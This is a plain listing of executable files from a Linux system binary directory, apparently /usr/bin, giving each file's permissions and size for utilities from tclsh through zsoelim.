-rwxr-xr-x
tclsh
9.039 KB
-rwxr-xr-x
tclsh8.6
9.039 KB
-rwxr-xr-x
tee
41.477 KB
-rwxr-xr-x
test
53.563 KB
-rwxr-xr-x
tic
85.313 KB
-rwxr-xr-x
timeout
41.859 KB
-rwxr-xr-x
tload
16.758 KB
-rwxr-xr-x
tmpwatch
35.469 KB
-rwxr-xr-x
toe
16.453 KB
-rwxr-xr-x
top
121.695 KB
-rwxr-xr-x
touch
93.938 KB
-rwxr-xr-x
tput
24.797 KB
-rwxr-xr-x
tr
49.625 KB
-rwxr-xr-x
traceroute
70.969 KB
-rwxr-xr-x
troff
805.023 KB
-rwxr-xr-x
true
33.328 KB
-rwxr-xr-x
truncate
41.359 KB
-rwxr-xr-x
tset
24.758 KB
-rwxr-xr-x
tsort
41.492 KB
-rwxr-xr-x
tty
33.313 KB
-rwxr-xr-x
tzselect
15.01 KB
-rwxr-xr-x
uapi
1.016 KB
-rwxr-xr-x
ul
20.586 KB
-rwxr-xr-x
uname
37.328 KB
-rwxr-xr-x
unexpand
45.609 KB
-rwxr-xr-x
uniq
49.641 KB
-rwxr-xr-x
unlink
33.344 KB
-rwxr-xr-x
unzip
201.883 KB
-rwxr-xr-x
unzipsfx
101.477 KB
-rwxr-xr-x
uptime
12.586 KB
-rwxr-xr-x
users
37.391 KB
-rwxr-xr-x
utmpdump
28.664 KB
-rwxr-xr-x
vacuumdb
78.461 KB
-rwxr-xr-x
vdir
139.898 KB
-rwxr-xr-x
vi
1.13 MB
-rwxr-xr-x
view
1.13 MB
-rwxr-xr-x
vim
2.93 MB
-rwxr-xr-x
vimdiff
2.93 MB
-rwxr-xr-x
vimtutor
2.071 KB
-rwxr-xr-x
vmstat
36.789 KB
-rwxr-xr-x
watch
29.188 KB
-rwxr-xr-x
wc
49.641 KB
-rwxr-xr-x
wget
521.414 KB
-rwxr-xr-x
whereis
29.273 KB
-rwxr-xr-x
which
29.383 KB
-rwxr-xr-x
who
53.594 KB
-rwxr-xr-x
whoami
33.336 KB
-rwxr-xr-x
word-list-compress
11.992 KB
-rwxr-xr-x
x86_64-redhat-linux-c++
1.21 MB
-rwxr-xr-x
x86_64-redhat-linux-g++
1.21 MB
-rwxr-xr-x
x86_64-redhat-linux-gcc
1.21 MB
-rwxr-xr-x
x86_64-redhat-linux-gcc-8
1.21 MB
-rwxr-xr-x
xargs
74.109 KB
-rwxr-xr-x
xmlcatalog
20.375 KB
-rwxr-xr-x
xmllint
73.367 KB
-rwxr-xr-x
xmlwf
36.961 KB
-rwxr-xr-x
xsltproc
28.469 KB
-rwxr-xr-x
xsubpp
4.961 KB
-rwxr-xr-x
xxd
20.539 KB
-rwxr-xr-x
yes
33.367 KB
-rwxr-xr-x
zcat
1.937 KB
-rwxr-xr-x
zcmp
1.638 KB
-rwxr-xr-x
zdiff
5.741 KB
-rwxr-xr-x
zegrep
0.028 KB
-rwxr-xr-x
zfgrep
0.028 KB
-rwxr-xr-x
zforce
2.031 KB
-rwxr-xr-x
zgrep
7.404 KB
-rwxr-xr-x
zip
229 KB
-rwxr-xr-x
zipcloak
102.906 KB
-rwxr-xr-x
zipgrep
2.884 KB
-rwxr-xr-x
zipinfo
201.883 KB
-rwxr-xr-x
zipnote
97.758 KB
-rwxr-xr-x
zipsplit
97.758 KB
-rwxr-xr-x
zless
2.153 KB
-rwxr-xr-x
zmore
1.798 KB
-rwxr-xr-x
znew
4.445 KB
-rwxr-xr-x
zsoelim
42.555 KB
-rwxr-xr-x